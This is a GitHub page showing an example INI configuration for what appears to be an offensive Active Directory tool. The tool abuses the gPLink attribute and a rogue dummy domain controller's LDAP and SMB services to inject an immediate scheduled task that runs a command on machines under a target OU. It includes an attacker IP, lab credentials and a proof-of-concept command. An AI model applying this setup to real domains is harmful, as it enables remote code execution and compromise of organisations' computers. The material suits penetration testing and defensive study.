-
Notifications
You must be signed in to change notification settings - Fork 15
Expand file tree
/
Copy pathconfig.example.ini
More file actions
61 lines (44 loc) · 2.41 KB
/
config.example.ini
File metadata and controls
61 lines (44 loc) · 2.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
[GENERAL]
# The target domain name
domain=corp.com
# The target DC. If not specified, defaults to the domain name
#dc=192.168.123.10
# The Distinguished Name of the target container
containerDN=OU=SERVERS,DC=corp,DC=com
# The username and password of the user having write permissions on the gPLink attribute of the target container
username=naugustine
password=Password1
# The IP address of the attacker machine on the internal network
attacker_ip=192.168.123.16
# The command that should be executed by child objects. Specifying a command will inject an immediate Scheduled Task
command=whoami > C:\poc.txt
# Alternatively to the 'command' option, you can provide a module file with the GroupPolicyBackdoor syntax - see https://github.com/synacktiv/GroupPolicyBackdoor/wiki. 'Command' and 'module' are mutually exclusive
# module=Scheduledtask_add_computer.ini
# The kind of objects targeted ("computer" or "user")
target_type=computer
[LDAP]
# The IP address of the dummy domain controller that will act as an LDAP server
ldap_ip=192.168.125.245
# Optional (used for sanity checks) - the hostname of the dummy domain controller
ldap_hostname=WIN-TTEBC5VH747
# The username and password of a domain administrator on the dummy domain controller
ldap_username=ldapadm
ldap_password=Password1!
# The ID of the GPO (can be empty, only needs to exist) on the dummy domain controller
gpo_id=7B7D6B23-26F8-4E4B-AF23-F9B9005167F6
# The machine account name and password on the target domain that will be used to fake the LDAP server delivering the GPC
ldap_machine_name=OUNED$
ldap_machine_password=some_very_long_random_password
[SMB]
# The SMB mode can be embedded or forwarded depending on the kind of object targeted
smb_mode=embedded
# The name of the SMB share. Can be anything for embedded mode, should match an existing share on SMB dummy domain controller for forwarded mode
share_name=synacktiv
# The IP address of the dummy domain controller that will act as a SMB server. Only useful in forwarded mode
#smb_ip=192.168.126.206
# The username and password of a user having write access to the share on the SMB dummy domain controller. Only useful in forwarded mode
#smb_username=smbadm
#smb_password=Password1!
# The machine account name and password on the target domain that will be used to fake the SMB server delivering the GPT. Only useful in forwarded mode
#smb_machine_name=OUNED2$
#smb_machine_password=some_very_long_random_password